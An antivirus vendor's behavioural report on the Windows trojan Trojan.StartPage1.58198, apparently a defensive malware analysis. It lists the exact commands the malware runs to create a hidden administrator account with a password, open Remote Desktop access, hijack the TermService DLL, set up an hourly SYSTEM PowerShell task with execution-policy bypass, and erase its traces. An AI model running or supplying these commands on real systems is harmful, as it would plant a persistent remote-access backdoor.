Trojan.StartPage1.58198

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\41030

Creates the following services

[<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%WINDIR%\help\tmp5211.dat'
[<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'

Modifies file system

Creates the following files

%TEMP%\nspebde.tmp\blowfish.dll
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\fax recipient.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\desktop (create shortcut).desklink
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\compressed (zipped) folder.zfsendtotarget
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\narrator.lnk
C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk
C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk
<SYSTEM32>\microsoft\protect\s-1-5-20\preferred
C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\run.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\windows explorer.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\command prompt.lnk
C:\users\supportaccount\ntuser.ini
C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat.log1
C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\mail recipient.mapimail
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\ease of access.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\magnify.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\on-screen keyboard.lnk
%TEMP%\vbypncxtbhmod.ps1
%TEMP%\nspebde.tmp\system.dll
%WINDIR%\help\tmp5211.dat
%WINDIR%\help\tmp5212.dat
%WINDIR%\help\tmp5213.dat
<SYSTEM32>\rfxvmt.dll
%WINDIR%\temp\usrnm.txt
C:\users\supportaccount\ntuser.dat.log1
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\notepad.lnk
<SYSTEM32>\microsoft\protect\s-1-5-20\b750b703-a91c-42a7-9992-67f5e4a8b479
C:\users\supportaccount\ntuser.dat
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\maintenance\help.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\maintenance\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\private character editor.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\computer.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\control panel.lnk
%TEMP%\chadshfsd323.txt
%PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
C:\users\supportaccount\ntuser.pol

Sets the 'hidden' attribute to the following files

C:\users\supportaccount\ntuser.dat
C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat

Deletes the following files

%TEMP%\nspebde.tmp\blowfish.dll
%TEMP%\nspebde.tmp\system.dll
%TEMP%\chadshfsd323.txt

Deletes itself.

Network activity

UDP

DNS ASK af####daslfo3d3.xyz

Miscellaneous

Searches for the following windows

ClassName: 'CicLoaderWndClass' WindowName: ''

Creates and executes the following

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1
'<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount asfggees /del' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj /add' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" supportaccount /ADD' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" supportaccount /ADD' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj' (with hidden window)
'<SYSTEM32>\cmd.exe' /C schtasks /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1
'<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" supportaccount /ADD
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
'<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" supportaccount /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Administrators" supportaccount /ADD
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" supportaccount /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" supportaccount /ADD
'<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" supportaccount /ADD
'<SYSTEM32>\net1.exe' user supportaccount GiFUmPnj
'<SYSTEM32>\cmd.exe' /C schtasks /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1
'<SYSTEM32>\schtasks.exe' /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1
'<SYSTEM32>\smss.exe' 00000000 0000003c
'<SYSTEM32>\csrss.exe' ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitializa...
'<SYSTEM32>\winlogon.exe'
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj
'<SYSTEM32>\net.exe' user supportaccount GiFUmPnj
'<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
'<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
'<SYSTEM32>\net1.exe' user supportaccount GiFUmPnj /add
'<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
'<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
'<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
'<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
'<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
'<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount asfggees /del
'<SYSTEM32>\net.exe' user supportaccount asfggees /del
'<SYSTEM32>\net1.exe' user supportaccount asfggees /del
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj /add
'<SYSTEM32>\net.exe' user supportaccount GiFUmPnj /add
'<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %WINDIR%\help\tmp5211.dat /f
'<SYSTEM32>\gpscript.exe' /RefreshSystemParam
'<SYSTEM32>\rdpclip.exe'

Attempts to shut down the Windows operating system.

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial